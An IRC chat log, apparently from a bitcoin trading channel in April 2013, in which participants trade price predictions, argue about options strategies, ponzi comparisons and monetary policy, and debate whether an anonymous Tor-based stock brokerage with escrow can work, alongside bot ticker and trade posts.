07 16:45:01 ;;ticker Apr 07 16:45:03 BTCUSD ticker | Best bid: 155.01201, Best ask: 155.95871, Bid-ask spread: 0.94670, Last trade: 155.95871, 24 hour volume: 33977.68618309, 24 hour low: 141.31000, 24 hour high: 157.00000, 24 hour vwap: 147.18995 Apr 07 16:45:12 what, not even 500 yet ? Apr 07 16:45:20 i know right Apr 07 16:45:22 middle of summer Apr 07 16:46:58 [MPEX] [S.DICE] 250 @ 0.00301847 = 0.7546 BTC [+] Apr 07 16:47:20 prob Apr 07 16:47:26 200 at month end Apr 07 16:47:36 500 by August... Apr 07 16:47:52 i'm thinking 185 at end of option period Apr 07 16:48:01 we'll see, but I think this will be known as the summer of bitcoin Apr 07 16:48:24 we will see many things launched in San Jose in may Apr 07 16:48:29 hopefully not because it was a saprk, a flame, and a cloud of smoke Apr 07 16:48:31 many will fail Apr 07 16:48:35 spark* Apr 07 16:48:40 some will succeed Apr 07 16:48:59 ThickAsThieves: I hope not also Apr 07 16:49:15 M157 Apr 07 16:49:19 and while I don't want it to grow too fast, it's no ones to control Apr 07 16:49:39 and now seems to be the time... Apr 07 16:49:46 rising this quickly is totally ponzi mode, so increasing risk of people left holding the bag Apr 07 16:50:06 I think in 2016, monetary policy will be big during elections Apr 07 16:50:21 and I predict bitcoin will be mentioned during debates Apr 07 16:50:23 could be Apr 07 16:50:44 its appalling how little the average person cares about inflation, etc Apr 07 16:50:57 ThickAsThieves: it is ponzi mode EXCEPT that believing makes it true in some ways Apr 07 16:50:57 "just the way it is" Apr 07 16:51:22 until less people believe than do, and cash outs snowball Apr 07 16:51:30 Ron Paul runs as libertarian 3rd party Apr 07 16:51:36 people actually listen Apr 07 16:51:51 nah Apr 07 16:51:56 3rd party aint happening yet Apr 07 16:52:01 he won't come close to winning Apr 07 16:52:06 not without some bigger change Apr 07 16:52:15 but he may get +10% Apr 07 16:52:41 and I also think that big change is coming Apr 07 16:52:50 i think social media has come a long way, and a 3rd party might indeed be able to "go viral" Apr 07 16:52:51 it's not going to be pretty Apr 07 16:53:34 I think there is a bolus of cash making its way to the markets...once it clogs that...embolism of the economy Apr 07 16:53:38 ATH Apr 07 16:53:43 157.5 Apr 07 16:53:59 ;;asks 159.99 Apr 07 16:54:02 There are currently 1373.9347 bitcoins offered at or under 159.99 USD, worth 218473.092151 USD in total. | Data vintage: 0.0010 seconds Apr 07 16:54:33 no one sees that QE hasn't hit the markets yet. the money is sitting in accounts, but is not widely distributed Apr 07 16:54:42 at least most of it Apr 07 16:55:12 think about it...how can I keep printing so fast, and prices are relatively stable? Apr 07 16:55:54 the banks which are selling the debt are not lending and spending...cuz they don't need to Apr 07 16:56:04 same as the bailout Apr 07 16:56:17 i dont know enough about how such things work, but I suppose it's at least possible for there to be a macro economy that encompasses much of newly printed money Apr 07 16:56:32 they gave them money to lend, but they didn't...credit crunch was worse Apr 07 16:56:37 in the end it would still result in inflation though Apr 07 16:56:51 I think the fed is depressing the price of gold Apr 07 16:56:59 using cheap fiat Apr 07 16:57:10 once that becomes unsustainable Apr 07 16:57:24 you'll see a run on the dollar, and into gold Apr 07 16:57:31 and bitcoin Apr 07 16:57:34 they are Apr 07 16:57:37 yes exactly Apr 07 16:57:50 you watch Parks and Recreation? Apr 07 16:57:58 all those effects will magnify the inflation Apr 07 16:58:07 and prices will go up severely Apr 07 16:58:17 for consumers Apr 07 16:58:27 THAT'S when they'll care Apr 07 16:58:46 I do watch P&R Apr 07 16:59:07 Ron Swanson had a funny scene where he says he doesnt know how much gold he has except in wait, and oh some palladium too Apr 07 16:59:14 weight* Apr 07 16:59:18 hehe Apr 07 16:59:28 I saw that yesterday! Apr 07 16:59:36 I don't know how much money I have Apr 07 16:59:48 but I know how many pounds of money I have Apr 07 17:00:15 better than weightless paper Apr 07 17:01:11 paper has weight Apr 07 17:01:15 ;) Apr 07 17:01:26 url to swanson vid? Apr 07 17:01:27 I like Jack Offerman Apr 07 17:01:46 makes things out of wood with his hands Apr 07 17:01:52 and still has time to act Apr 07 17:01:54 so I could see gold hitting 2k/oz Apr 07 17:02:30 it JUST aired kako, not sure where it would be online other than dl'ing latest ep Apr 07 17:02:40 ah the last ep. Apr 07 17:02:48 ill see it then. Apr 07 17:03:07 wait, I meant Nick Offerman Apr 07 17:03:27 https://www.facebook.com/OffermanWoodshop Apr 07 17:04:12 http://youtu.be/l_3_9zK4y-Q here's a Ron Swanson gold quote Apr 07 17:04:12 hehe http://www.facebook.com/photo.php?fbid=237735892946898&set=a.237734052947082.61290.235639199823234&type=1&relevant_count=1 Apr 07 17:04:20 but not the one from thur Apr 07 17:05:08 [BTCTC] [CRYPTO-TRADE] 50 @ 0.2 = 10 BTC [+] Apr 07 17:05:51 or have I? :) Apr 07 17:06:01 lmao Apr 07 17:06:07 hehehe Apr 07 17:06:47 hmmm Ron Swanson mentioning bitcoin? love of anonymity, but dislike of tech... Apr 07 17:07:02 good long term BBET maybe Apr 07 17:07:42 also mentioned during 2016 debates is a good one Apr 07 17:11:59 first they ignore you, then they laugh at you, then they fight you, then you win Apr 07 17:12:58 [MPEX] [S.MPOE] 3100 @ 0.00065754 = 2.0384 BTC [-] Apr 07 17:16:31 [MPEX] [S.MPOE] 5250 @ 0.00066418 = 3.4869 BTC [+] Apr 07 17:16:33 [MPEX] [S.MPOE] 4750 @ 0.00066566 = 3.1619 BTC [+] Apr 07 17:21:03 [HAVELOCK] [KCIM] 3 @ 1.19 = 3.57 BTC [+] Apr 07 17:40:19 [BTCTC] [GSDPT] 40 @ 0.003 = 0.12 BTC [-] Apr 07 17:44:10 ;;ticker Apr 07 17:44:11 BTCUSD ticker | Best bid: 156.00000, Best ask: 157.99900, Bid-ask spread: 1.99900, Last trade: 156.00000, 24 hour volume: 36710.60460093, 24 hour low: 141.40000, 24 hour high: 159.00000, 24 hour vwap: 148.07204 Apr 07 17:46:19 ThickAsThieves: it is ponzi mode << no it's not. Apr 07 17:46:28 no sentiment based thing can take 4 days off Apr 07 17:46:31 bitcoin did. Apr 07 17:46:46 lol I didn't mean it that way...context Apr 07 17:47:30 mircea btw, are there new options with higher strikes planned? or at opex soonest? Apr 07 17:48:03 a, i can add more at any time Apr 07 17:48:22 ThickAsThieves: "They" got a chance to buy back in, so it can rally a bit now. Apr 07 17:50:55 The online betting Web site Intrade, which gained widespread notice for serving as a predictions platform for elections and events not related to sports, is facing liquidation because of a $700,000 cash shortfall, a development that comes a month after it halted trading and froze its customer accounts. Apr 07 17:50:55 Intrade’s director, Ronald Bernstein, said in a statement that the shortfall resulted from unspecified actions by two other parties, whom he did not name. Apr 07 17:50:57 totally. Apr 07 17:51:06 ian bakewell and eskimo bob Apr 07 17:51:26 really? Apr 07 17:52:05 the first two lines ? yea. Apr 07 17:52:15 the founder just looted the corp accoutns is all. Apr 07 17:52:57 lulz Apr 07 17:53:07 my earlier point was related to how banks are "ponzis" (loosely using that as a term for general speculation) in any trust based system if trust leaves the last one holding the bag is screwed Apr 07 17:53:16 bitcoinity dead ? Apr 07 17:53:29 that's what I've heard today Apr 07 17:53:38 yes, poor bitcoinity, few hours already Apr 07 17:53:40 MJR_ ya well not everything that relies on trust or appreciates in value is a ponzi. Apr 07 17:53:44 ;;goxlag Apr 07 17:53:45 MtGox lag is 0 seconds. During this time, light travels 0.0 AU. You could have sent a bitcoin ... nowhere, really (0 AU). Apr 07 17:56:48 I think 200 can happen real fast Apr 07 17:56:54 at least faster than you think Apr 07 17:57:28 anything can happen real fast or at least faster than you think Apr 07 17:57:36 :> Apr 07 17:57:41 its coming. i threw the bones .. they sgree. Apr 07 17:57:47 agree Apr 07 17:57:51 for instance, a hot young thing walking into your office naked takes all of 6 seconds Apr 07 17:57:51 keep laughing Apr 07 17:58:03 it could happen, and i bet you it'd be faster than you'd think Apr 07 17:59:35 mircea_popescu: almost nothing is a "ponzi", as it refers to a specific sort of scam. if we are conflating that term with tulip mania or bubble, then most things are...the only difference in them is the probability that they become unpopular Apr 07 17:59:41 let's start including reasons for our guesses when we voice them.. for example, i think 200 can happen real fast because of something something Apr 07 18:00:18 taub: what is the something something reason for thinking 200 can happen real fast? Apr 07 18:00:36 one could argue that Mercedes are a "bubble" if everyone decides that luxury vehicles are retarded. Apr 07 18:00:46 sup MJR Apr 07 18:00:58 that is unlikely, as fast cars are universally cool as are leather warm seats Apr 07 18:01:18 sup KRS1 Apr 07 18:01:24 so the big question is.. are bitcoins cool or not? Apr 07 18:01:35 right now obviously yes Apr 07 18:01:39 haha Apr 07 18:01:45 yup Apr 07 18:01:45 so were beanie babies Apr 07 18:01:51 until women dig em i'll say meh Apr 07 18:01:52 difference is utility Apr 07 18:02:05 I know many women who love bitcoins :) Apr 07 18:02:14 bitcoins: like beaning babies for drug addicts and nerds Apr 07 18:02:15 cant exactly walk up to a hot women and say, check out my bitcoins beeotch Apr 07 18:02:20 beanie Apr 07 18:02:26 nah Apr 07 18:02:40 then unF unF unF all night long buttsecks Apr 07 18:02:42 bitcoins have utility and "intrinsic" value Apr 07 18:02:49 iz: just the pattern, big move, long congestion, big move Apr 07 18:02:59 its' less than another 50% move to 200 Apr 07 18:03:09 well, all im saying is im glad I have the 164 call Apr 07 18:03:41 taub: i find with trends it's better to identify the CAUSE of the chart move, and then determine if you are seeing a similar cause happen and then notice the effect on the chart Apr 07 18:03:51 https://bitcointalk.org/index.php?topic=165766.msg1762710#msg1762710 Apr 07 18:03:52 I think the number im looking for in long term stability is ~2700 Apr 07 18:04:01 so criptostox/vircurex is about going rogue Apr 07 18:04:10 i dont think about causes Apr 07 18:04:14 taub: it's not so good to just look at the charts that are effected by causes and doing voodoo and gambler's logic on the charts based on how they look or what your gut says Apr 07 18:04:24 imho Apr 07 18:04:26 that number means rough parity with silver Apr 07 18:04:34 nah it can work Apr 07 18:04:49 taub: a broken clock can be right twice a day too Apr 07 18:04:52 other markets are traded like this, why should bitcoin be different Apr 07 18:05:06 taub: other markets are traded by idiots that way Apr 07 18:05:12 so bitcoin shouldn't be any different Apr 07 18:05:16 KRS1 actually i have. Apr 07 18:05:19 okay fuck you Apr 07 18:05:29 sorry, i didn't maen that to come out that way Apr 07 18:05:37 i gave my opinion, im not gonna go into some ta debate again Apr 07 18:05:49 but just because ppl do it in other markets and are successful while the market is growing doesn't mean it's a good strategy Apr 07 18:06:00 point taken Apr 07 18:06:15 but of course it will work in the bitcoin wolrd AS LONG as the bitcoin market keeps growing Apr 07 18:06:21 that's what the market is there for...deciding who is right Apr 07 18:06:41 whatever iz Apr 07 18:06:44 90% of the time tne best and hardrst decision is to hold and wait. Apr 07 18:07:02 [HAVELOCK] [VTX] 1 @ 0.4399999 BTC [-] Apr 07 18:07:02 deadweasel: yep ^^ this Apr 07 18:07:27 especially with S.DICE T_T Apr 07 18:07:51 taub: i didn't mean any offense, but i do strongly suggest you consider looking at causes when trading Apr 07 18:08:15 yeah, now that hes out of the US, im actually doubling up while the price is low. Apr 07 18:08:24 opposed to being intentionally ignorant about the causes Apr 07 18:08:33 ;;seen smickles Apr 07 18:08:33 smickles was last seen in #bitcoin-assets 2 days, 23 hours, 25 minutes, and 59 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 07 18:08:45 ;;seen Bugpowder Apr 07 18:08:45 Bugpowder was last seen in #bitcoin-assets 11 hours, 7 minutes, and 44 seconds ago: boooring Apr 07 18:08:47 there is zero point in knowing the cause of a move Apr 07 18:08:53 I disagree Apr 07 18:08:54 $avg Apr 07 18:08:56 thestringpuller: 146.86 Apr 07 18:08:57 it goes like this 99% of the time Apr 07 18:08:59 i disagree Apr 07 18:09:00 info is always valuable Apr 07 18:09:05 smart money buys when price is slow and steady Apr 07 18:09:15 stupid money chaeses price up Apr 07 18:09:19 smart money gets upt at top Apr 07 18:09:22 repeat Apr 07 18:09:42 and that action is reflected in prices Apr 07 18:09:44 yes, but picking tips and bottoms is where it gets hard Apr 07 18:09:44 and that you can trade Apr 07 18:09:45 well, you just looked at the causes... Apr 07 18:10:01 some of them Apr 07 18:10:07 there's more to it though Apr 07 18:10:08 that is one underlying cause to everything, i dont need to know it Apr 07 18:10:14 cant pick tops/bottoms, onlu guesses Apr 07 18:10:17 well i dont care about those Apr 07 18:10:24 as long as it gets price to move, good then i can trade it Apr 07 18:10:26 !ticker m ^OIX Apr 07 18:10:27 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 104.18044961 / 119.45293202 / 153.10362074 (28208 shares, 11,835.72 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Apr 07 18:10:46 so...Walmart decides to implement PoS system for bitcoin...irrelevant cause? Apr 07 18:11:00 ;;calc 160-151 / 160 Apr 07 18:11:00 159.05625 Apr 07 18:11:07 ;;calc (160-151 )/ 160 Apr 07 18:11:07 0.05625 Apr 07 18:11:10 or justifiable reason for price surge? Apr 07 18:11:18 MJR_ link? Apr 07 18:11:24 what would that help me in trading? Apr 07 18:11:24 hypothetical Apr 07 18:11:28 no...thought experiment Apr 07 18:11:34 yes hypothetical Apr 07 18:11:42 MJR__: source? Apr 07 18:11:48 lol Apr 07 18:11:48 heh Apr 07 18:12:09 so...HomeDepot decides to implement PoS system for bitcoin...irrelevant cause? Apr 07 18:12:16 lol Apr 07 18:12:25 :) Apr 07 18:12:32 just saying, im a big fan in investing in fundamentals Apr 07 18:12:41 real reasons Apr 07 18:13:03 not cuz I see a "cup and handle" or "head and shoulders" Apr 07 18:13:13 iz: there are endless approaches to trading, mine doesnt include analizing news and causes Apr 07 18:13:35 taub: agreed, lots of ways to skin a cat Apr 07 18:13:36 MJR_, it can be used for timing Apr 07 18:13:39 i still get a feel for the "buzz" in irc, but it's usually just buzzing back what prices are showing already anyway Apr 07 18:14:12 saulimus: I agree...just don't find it accurate FOR ME Apr 07 18:15:38 is this the most efficient method for global finance...yes as of right now, what should that be worth? more than it currently is = buy Apr 07 18:16:14 then again, I've told you my med term target $2700 Apr 07 18:16:37 MJR__: its not worth more thab 150 coin yet Apr 07 18:16:39 people who get rich from volatility are exchanges and brokers Apr 07 18:16:47 yup Apr 07 18:17:06 MJR__: you can also make money on stable prices Apr 07 18:17:10 deadweasel> cant pick tops/bottoms, onlu guesses, agreed Apr 07 18:17:23 ^^ agree Apr 07 18:17:24 but you can certainly see areas where you don't want to buy anymore Apr 07 18:17:25 or sell Apr 07 18:18:09 the best strategy so far in the stock market, over almost any 20 year period, would be broad based index fund, but and hold Apr 07 18:18:15 buy* Apr 07 18:18:19 ;;ticker Apr 07 18:18:20 BTCUSD ticker | Best bid: 158.33300, Best ask: 158.99990, Bid-ask spread: 0.66690, Last trade: 158.99990, 24 hour volume: 37140.60115126, 24 hour low: 142.01000, 24 hour high: 159.00000, 24 hour vwap: 148.49438 Apr 07 18:18:38 ;;asks 160 Apr 07 18:18:38 There are currently 1497.9519 bitcoins offered at or under 160.0 USD, worth 238716.812309 USD in total. | Data vintage: 81.7698 seconds Apr 07 18:18:49 ;;bids 155 Apr 07 18:18:49 There are currently 1192.4376 bitcoins demanded at or over 155.0 USD, worth 185610.325603 USD in total. | Data vintage: 93.2826 seconds Apr 07 18:18:54 ;;bids 157 Apr 07 18:18:54 There are currently 11.335636 bitcoins demanded at or over 157.0 USD, worth 1787.4288674 USD in total. | Data vintage: 98.0251 seconds Apr 07 18:18:57 thats maybe a very safe startegy, but not one with terrific returns Apr 07 18:19:03 mircea_popescu: what do you think of torbroker? Apr 07 18:19:17 mircea_popescu is asleep non? Apr 07 18:19:20 taub: it would have performed the best so far... Apr 07 18:19:45 S&P, Dow, etc all time highs Apr 07 18:20:08 MJR__: stop speculating provide value to the community Apr 07 18:20:10 so you mean that would be the best buy and hold strategy Apr 07 18:20:16 yes Apr 07 18:20:24 thestringpuller: im not speculating Apr 07 18:20:37 i think he was being saracstic (i hope) Apr 07 18:20:46 w/e Apr 07 18:21:05 im saying but and hold is a great way to preserve and grow wealth Apr 07 18:21:08 taub: the best startegy is to write options at the beginning of the month that are safe, then at the end of the month buy options if there is a big move Apr 07 18:21:13 ugh *buy Apr 07 18:21:42 diversify yo bonds Apr 07 18:21:43 writing options is very expensive :) Apr 07 18:21:46 hehehe Apr 07 18:21:53 too expensive IMO Apr 07 18:21:55 not really Apr 07 18:22:05 collateral requirements Apr 07 18:22:10 low ROI Apr 07 18:22:13 again not really Apr 07 18:22:15 vs buying Apr 07 18:22:24 not really lol Apr 07 18:22:33 all I've done is but calls Apr 07 18:22:38 so far so good Apr 07 18:22:53 fuck my phone! buy buy buy! Apr 07 18:22:53 i can make 1btc on 6 coins from writing Apr 07 18:23:08 at beginning of mobth Apr 07 18:23:14 vs making 5 coins on 1 with buying? Apr 07 18:23:30 not at the beginning of the month Apr 07 18:23:44 time decay doesnt kick in until the 15th Apr 07 18:23:57 well, I think I got 41 calls, not sure when, but I exercised at 71 Apr 07 18:24:28 that must have been last month Apr 07 18:24:29 I like to leave bids out for calls at a price I think makes sense, get filled cuz of volatility Apr 07 18:24:35 yep Apr 07 18:24:52 month before I had calls in the 20's I think? Apr 07 18:25:00 [BTCTC] [BASIC-MINING] 11 @ 0.39 = 4.29 BTC [+] Apr 07 18:25:11 yea last month price diverged from 24hprc 7 days before expiry so options were hella cheap Apr 07 18:25:22 yep Apr 07 18:25:32 but I didn't hold like I should have Apr 07 18:25:40 Bugpowder went balls deep at C75 Apr 07 18:26:12 didn't follow my own advice and got "burned" Apr 07 18:26:29 i think that made 250% but only because it was so close to expiration Apr 07 18:26:36 yeah Apr 07 18:26:52 also I couldn't get options far enough out of the money Apr 07 18:27:05 due to $75 strike limit Apr 07 18:27:11 timing the market is bad which is why writing options at the beginning of the month hedges if the price is stable Apr 07 18:27:18 true Apr 07 18:27:25 100% agree Apr 07 18:27:35 just don't like tying up the capital Apr 07 18:27:46 I know nothing of options, but are they that much more profitable than simply buying/selling USD/BTC directly? Apr 07 18:27:49 yea but what else would you use it foe? Apr 07 18:27:55 are they more risky? Apr 07 18:27:59 buying calls lol Apr 07 18:28:09 saulimus: they are more risky Apr 07 18:28:20 so what's the advantage? Apr 07 18:28:20 saulimus: they are derivatives, more risky greater possible returns Apr 07 18:28:23 saulimus: they depens on huge swings in price Apr 07 18:28:38 many strategies possible Apr 07 18:28:39 saulimus: they provide more leverage on your "bet" Apr 07 18:28:46 example Apr 07 18:28:51 short straddle means I want price to stay steady Apr 07 18:29:12 last week options at 75 went for .06 a contract Apr 07 18:29:25 break even point was thus 81 usd Apr 07 18:29:27 yea, they provide leverage, and there are advanced option strategies like making money as long as price moves somewhere (up or down) Apr 07 18:29:28 calls? Apr 07 18:29:30 price shot up to 91 Apr 07 18:30:13 for every call you own you get 100% additional leverage as the peice rises Apr 07 18:30:18 taub: yeah long straddle is my fave on earnings day Apr 07 18:30:33 straddles are for last resort Apr 07 18:30:51 for people who make bad put bets like Bugpowder Apr 07 18:30:55 jkjk Apr 07 18:30:57 great for earnings...aapl and Netflix, you would have KILLED it last month Apr 07 18:31:12 but in BTC way too expensive Apr 07 18:31:22 i did puts on aapl in oct Apr 07 18:31:31 then exited the market Apr 07 18:31:36 nice Apr 07 18:31:39 do option prices go up on expected volatility MJR__ ? Apr 07 18:31:41 in real markets Apr 07 18:31:45 now I am doing strictly btc Apr 07 18:32:01 taub: depends on the underwriter Apr 07 18:32:10 taub: they price volatility into it in black scholes Apr 07 18:32:20 merill lynch may charge more than other etrade etc erx Apr 07 18:32:23 which is what most use Apr 07 18:32:27 yea Apr 07 18:32:35 but where they get that volatility from :) Apr 07 18:32:40 probably use a bunch of methods Apr 07 18:32:46 that can also be based on what numbers they pick for expected volatility Apr 07 18:32:47 historical as well as trying to predict it Apr 07 18:32:59 exactly in other words crap shoot Apr 07 18:33:00 you take a duration like 10m or 1h or 7d and do high - low Apr 07 18:33:25 then put that into b-s formula and out pops a volatility greek Apr 07 18:33:32 yep Apr 07 18:33:51 i was excited this weekend at price stability Apr 07 18:34:00 but looks like n00bs are rallying again Apr 07 18:34:05 I think bitcoin is so volatile, that you could have a second order derivative of its volatility (fun) Apr 07 18:34:07 btc brings the finance geeks together Apr 07 18:34:13 yep Apr 07 18:34:14 [BTCTC] [GSDPT] 30 @ 0.00285 = 0.0855 BTC [-] Apr 07 18:34:17 btc is educational Apr 07 18:34:22 for sure Apr 07 18:34:29 very, that's one of my fave things about it Apr 07 18:34:34 but soon it wont be a toy anymore Apr 07 18:34:52 words of 2013: fiat, bitcoin, inflation, deflation Apr 07 18:34:54 second we hit 1k the world's billionaires will enter the game Apr 07 18:35:09 they are starting now (some) Apr 07 18:35:14 MJR__ i have no idea. Apr 07 18:35:33 mircea_popescu: did you read about it? Apr 07 18:36:09 it made it in the summaries yest or w/e Apr 07 18:36:13 ;;bids 158 Apr 07 18:36:16 There are currently 347.35852 bitcoins demanded at or over 158.0 USD, worth 54924.5144862 USD in total. | Data vintage: 0.0049 seconds Apr 07 18:36:30 ;;asks 160 Apr 07 18:36:31 There are currently 1059.539 bitcoins offered at or under 160.0 USD, worth 168977.500895 USD in total. | Data vintage: 14.9814 seconds Apr 07 18:36:40 my main issue is that it is not "holdable", in that you must rely on govt to back up your property rights, while flaunting their regulation Apr 07 18:37:01 [HAVELOCK] [VTX] 1 @ 0.41 BTC [-] Apr 07 18:37:09 MJR__ looky here : https://bitcointalk.org/index.php?topic=168992.msg1762685#msg1762685 Apr 07 18:37:11 same principle applies. Apr 07 18:37:18 !ticker h HIM Apr 07 18:37:19 unknown party offering to steal your money ? Apr 07 18:37:19 [HAVELOCK:HIM] 1D: 1.82000000 / 1.85673684 / 1.90000000 (19 shares, 35.27800000 BTC), 7D: 1.82000000 / 1.95105351 / 2.06000000 (114 shares, 222.42010000 BTC), 30D: 1.41000000 / 1.8417252 / 2.08000000 (706 shares, 1300.25799220 BTC) Apr 07 18:37:20 pass. Apr 07 18:38:55 full disclosure: you are a confidence man Apr 07 18:39:33 i'm sure he'll manage the coins, he just wont send them back Apr 07 18:40:06 not actually requesting transfer Apr 07 18:40:20 Oh i see Apr 07 18:40:29 anyway, tor broker is completely different Apr 07 18:41:03 it's a brokerage account/ exchange with accounts in BTC allowing you to buy US equities Apr 07 18:41:20 AAPL, BAC etc Apr 07 18:41:30 Silk Road for Wall Street Apr 07 18:41:54 problem is, SR can deliver physically, not sure it TB can Apr 07 18:42:13 *if Apr 07 18:42:28 The best 'sounding board' for bitcoin investments is this channel… Apr 07 18:42:40 seems uselss except for tax evasion Apr 07 18:43:00 Bugpowder: true Apr 07 18:43:16 well...lots of regulation on the stock market Apr 07 18:43:27 Bugpowder: you can be the chairman of calls Apr 07 18:43:33 cutting off access to some Apr 07 18:43:41 depends where you live I guess, for example i think spread betting is still tax free in the uk Apr 07 18:44:15 that's a CFD? Apr 07 18:44:26 those are not allowed in US Apr 07 18:44:31 USSA Apr 07 18:44:43 yea and you have that daytrading limit right Apr 07 18:44:45 wtf Apr 07 18:44:52 such nonesense Apr 07 18:45:56 [BTCTC] [ASICMINER-PT] 1 @ 0.7511 BTC [-] Apr 07 18:45:58 [BTCTC] [ASICMINER-PT] 1 @ 0.751 BTC [-] Apr 07 18:46:37 MJR__ completely different ? Apr 07 18:46:53 how is it completely different. it works on the premise "i'm nobody give me dough". Apr 07 18:46:58 mircea_popescu: are we talking about the same thing? Apr 07 18:46:58 i fail to see any difference. Apr 07 18:47:25 well i think so. how we check ? Apr 07 18:47:26 torbroker: buy and sell equities using accounts denominated in bitcoin Apr 07 18:47:30 right. Apr 07 18:47:34 MJR__ the second order derivative of btc volatility does exist Apr 07 18:47:48 it's MPBPT options on bitfunder Apr 07 18:47:53 that guy: Skype chat and I'll give you financial advice Apr 07 18:48:06 i don't say they are actually usable or not, tho Apr 07 18:48:15 ah ok thanks jurov Apr 07 18:48:23 so what difference do you see ? Apr 07 18:48:43 that guy did not request transfer of bitcoin in public Apr 07 18:48:59 whether that was a private thing, who can now Apr 07 18:49:03 know* Apr 07 18:49:04 right. Apr 07 18:49:10 seems very slight. Apr 07 18:49:17 so he didn't say "give me money" Apr 07 18:50:00 torbroker is saying want to sell your aapl stock for BTC? we can arrange a place for buyers and sellers to meet Apr 07 18:50:07 so i can currently take a fiart position in any stock, fund, whatever, by calling my browser. Apr 07 18:50:10 broker lol Apr 07 18:50:24 yet i am going to send valuable btc to some anon noob. Apr 07 18:50:25 ACAT it to another account I guess Apr 07 18:50:42 escrow the transaction Apr 07 18:50:55 once stock position is delivered, release BTC Apr 07 18:50:59 [MPEX] [S.MPOE] 15900 @ 0.00065754 = 10.4549 BTC [-] Apr 07 18:51:06 right. Apr 07 18:51:20 not even in the same arena of finance... Apr 07 18:51:25 seems dumb to buy wall set stock with btc Apr 07 18:51:28 st Apr 07 18:51:31 and then two years down the road be served with tax fraud, money laundering and rico conspiracy Apr 07 18:51:36 on the confession of the escrow. Apr 07 18:51:54 mircea_popescu: anonymous on tor network with BTC Apr 07 18:52:05 mircea_popescu: have to research more Apr 07 18:52:05 the stock you deliver is not anonymous. Apr 07 18:52:12 dja understand that part ? Apr 07 18:52:17 but can't be tied to transaction Apr 07 18:52:25 it will be tied to something. Apr 07 18:52:43 I can send my stock to whatever account I want iirc Apr 07 18:52:48 sure. Apr 07 18:52:53 as long as its not restricted Apr 07 18:52:54 and then escrow confesses and you get charged. Apr 07 18:53:06 breaking news USD was just hacked: http://www.naijatrends.com/page_images/989731796_1347604230.jpg Apr 07 18:53:07 I believe that's the point of tor... Apr 07 18:53:24 SR can confess to your escrow Apr 07 18:53:24 but escrow must be able to verify transaction dood. Apr 07 18:53:27 [BTCTC] [GSDPT] 5 @ 0.00285 = 0.0143 BTC [-] Apr 07 18:53:40 how does escrow know who to release to ? Apr 07 18:53:54 lol thestringpuller Apr 07 18:54:03 I was saying that stock is directly transferred Apr 07 18:54:13 escrow is for BTC Apr 07 18:54:18 ;;ticker Apr 07 18:54:21 BTCUSD ticker | Best bid: 159.00001, Best ask: 159.06500, Bid-ask spread: 0.06499, Last trade: 159.06500, 24 hour volume: 38316.07677332, 24 hour low: 142.01000, 24 hour high: 159.50000, 24 hour vwap: 149.08608 Apr 07 18:54:36 MJR_ escrow is for btc ?! Apr 07 18:54:51 bitcoinity is back Apr 07 18:54:59 but don't have all the details, long story short, a guy giving away advice for free and a black market for wall st are not related in any way Apr 07 18:55:00 let's play this out cause apparently it's hard. A has 100 AAPL. B has 100 BTC. X is escrow. Apr 07 18:55:10 A claims he's delivered 100 AAPL. B claims he never got it. Apr 07 18:55:13 what does X do ? Apr 07 18:55:39 hold on Apr 07 18:55:48 there's nothing he can do. if he has a means to actually verify tx then it's not anon. Apr 07 18:55:55 if it is anon then he can't verify. end of story. Apr 07 18:56:09 and without viable escrow, the deal simply is, "i ar anon, send monyz plz thx" Apr 07 18:56:23 which makes both the exact same thing, sobletters on the interwebs. Apr 07 18:57:01 [BTCTC] [PAJKA.BOND] 5 @ 0.095 = 0.475 BTC [-] Apr 07 18:57:33 [BTCTC] [PAJKA.BOND] 1 @ 0.102 BTC [+] Apr 07 18:57:36 [BTCTC] [PAJKA.BOND] 1 @ 0.101 BTC [-] Apr 07 18:57:44 [BTCTC] [PAJKA.BOND] 1 @ 0.1005 BTC [-] Apr 07 18:57:47 [BTCTC] [PAJKA.BOND] 1 @ 0.1004 BTC [-] Apr 07 18:57:49 [BTCTC] [PAJKA.BOND] 1 @ 0.1 BTC [-] Apr 07 18:58:17 one asking for money to be sent the other isn't Apr 07 18:58:32 guess it comes down to how broad you want to paint the strokes Apr 07 18:58:41 two humans talking, same thing Apr 07 18:59:10 I don't think it had to be anon to the parties involved Apr 07 18:59:24 just anon to the market outside those two parties Apr 07 18:59:51 lets say I had 100 shares of aapl, but want bitcoin... Apr 07 19:00:05 MJR__: but the irl stock have to be on some irl account, not somewhere anonymously in the air Apr 07 19:00:10 question, I would like to replicate some of dooglus work on monitoring Sdice... are the BitcoinArmory scripts updated to work with the new chain structure ? Apr 07 19:00:25 jurov: I agree Apr 07 19:00:26 i mean the new files for bitcoin-qt (the fact that the full old chain isnt there anymore) Apr 07 19:00:34 ;;ticker Apr 07 19:00:36 BTCUSD ticker | Best bid: 159.98500, Best ask: 160.00000, Bid-ask spread: 0.01500, Last trade: 160.00000, 24 hour volume: 38378.01921193, 24 hour low: 142.01000, 24 hour high: 159.67001, 24 hour vwap: 149.13329 Apr 07 19:00:41 it would be at DTC Apr 07 19:01:10 lemme do more research before I speculate Apr 07 19:01:44 gesell the script he;'s running is public. Apr 07 19:01:48 ask him, he'll tell you Apr 07 19:02:37 MJR__ the issue are not the parties themselves, but the escrow. that's the leak here. Apr 07 19:03:07 Hello Apr 07 19:03:13 mircea_popescu: thanks. will look deaper Apr 07 19:03:21 hi. Apr 07 19:03:29 cccjd: hi Apr 07 19:03:33 Anyone wanna trade BTC-E to PayPal Apr 07 19:03:52 cccjd: next door #bitcoin-otc, please Apr 07 19:04:11 ;;ticker Apr 07 19:04:12 BTCUSD ticker | Best bid: 159.99010, Best ask: 160.00000, Bid-ask spread: 0.00990, Last trade: 160.00000, 24 hour volume: 38378.01921193, 24 hour low: 142.01000, 24 hour high: 159.67001, 24 hour vwap: 149.13329 Apr 07 19:04:54 ;;ticker Apr 07 19:04:55 BTCUSD ticker | Best bid: 160.00000, Best ask: 161.00000, Bid-ask spread: 1.00000, Last trade: 160.00000, 24 hour volume: 38378.01921193, 24 hour low: 142.01000, 24 hour high: 159.67001, 24 hour vwap: 149.13329 Apr 07 19:05:12 mircea_popescu: not only escrow is the difference. if such scheme was done for mpex stocks, there isn't that legal liability Apr 07 19:05:28 reeeally? as if bank transfers all game in on the weekend? Apr 07 19:05:35 s/game/came Apr 07 19:05:35 well that's because escrow could verify that a push was made. Apr 07 19:06:00 gesell no, the ask side is 